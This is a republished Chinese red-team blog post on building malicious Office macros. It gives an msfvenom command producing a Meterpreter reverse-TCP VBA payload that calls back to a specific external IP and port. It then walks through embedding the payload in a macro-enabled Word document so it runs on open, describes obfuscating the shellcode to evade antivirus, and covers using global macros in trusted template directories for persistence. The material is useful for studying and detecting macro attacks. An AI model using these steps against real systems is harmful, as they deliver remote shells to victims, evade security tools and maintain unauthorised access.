office宏 « 倾旋的博客
2019-07-04 15:18:22 Author: payloads.online(查看原文) 阅读量:276 收藏

0x00 宏 - Macro

office宏,译自英文单词Macro。宏是微软公司为其office软件包设计的一个特殊功能,软件设计者为了让人们在使用软件进行工作时,避免一再地重复相同的动作而设计出来的一种工具,它利用简单的语法,把常用的动作写成宏,当在工作时,就可以直接利用事先编好的宏自动运行,去完成某项特定的任务,而不必再重复相同的动作,目的是让用户文档中的一些任务自动化。

Visual Basic for Applications(VBA)是Visual Basic的一种宏语言,是微软开发出来在其桌面应用程序中执行通用的自动化(OLE)任务的编程语言。主要能用来扩展Windows的应用程序功能,特别是Microsoft Office软件。也可说是一种应用程式视觉化的Basic 脚本。该语言于1993年由微软公司开发的的应用程序共享一种通用的自动化语言-Visual Basic for Application(VBA),实际上VBA是寄生于VB应用程序的版本。

0x01 生成宏

$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=71.19.144.69 LPORT=8899 -f vba -o try.vba

使用msf就可以生成宏代码,接下来只要放入word或者excel、ppt即可。

0x02 创建宏

新建一个文档,另存为“启用宏的Word文档”:

2019-05-15-14-00-36

视图-查看宏:

2019-05-15-14-02-48

随便输入一个宏名称,点击“创建”:

2019-05-15-14-03-34

此时进入宏编辑器:

2019-05-15-14-04-57

将msf生成的payload放入:

2019-05-15-14-05-45

保存文件,关闭,再打开即可执行宏代码。

0x03 宏代码分析

msf生成默认的vba会导入三个api函数,常见的shellcode加载器代码:

2019-05-15-14-07-11

  • CreateThread 创建线程
  • VirtualAlloc 申请虚拟内存空间
  • RtlMoveMemory 拷贝内存
HANDLE CreateThread(
  LPSECURITY_ATTRIBUTES   lpThreadAttributes,
  SIZE_T                  dwStackSize,
  LPTHREAD_START_ROUTINE  lpStartAddress,
  __drv_aliasesMem LPVOID lpParameter,
  DWORD                   dwCreationFlags,
  LPDWORD                 lpThreadId
);
LPVOID VirtualAlloc(
  LPVOID lpAddress,
  SIZE_T dwSize,
  DWORD  flAllocationType,
  DWORD  flProtect
);
VOID RtlMoveMemory(
  VOID * Destination,
  VOID * Source,
  DWORD Length
);

其中Array(72,131,228,240,232,...就是shellcode,混淆的办法有很多种。

shellcode可以自己在VBA里解码或者比如每个元素自增1,运行的时候-1,达到免杀…

0x04 效果

在线地址:https://www.bilibili.com/video/av52532639/

0x05 拓展分析

如果创建的是全局宏,Office会在这个目录生成一个dotm文档:

C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Templates

2019-05-15-14-53-42

全局宏是对于当前计算机所有文档对象有效,即文档本身不包含宏代码,也可以运行全局宏。

2019-05-15-14-54-49

很遗憾,全局宏没有一个固定的名称,也就是说要先通过Office创建一个全局宏,然后其他文档打开时才可以执行代码。

2019-05-15-15-52-06

经过测试,这个全局宏中的文件:vbaProject.bin是包含了特征的文件,但是反病毒软件不会扫描这个文件,除非主动查杀。

这个特性可能可以达到维持权限的作用。

后来才发现我使用的还是全局宏达到的免杀

HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\PowerPoint\Security\Trusted Locations

同过PorcessMonitor分析,从注册表找到几个授信目录:

  • %APPDATA%\Microsoft\Templates
  • C:\Program Files\Microsoft Office\Root\Templates\
  • %APPDATA%\Microsoft\Addins
  • C:\Program Files\Microsoft Office\Root\Document Themes 16\

文章来源: https://payloads.online/archivers/2019-05-16/1
如有侵权请联系:admin#unsafe.sh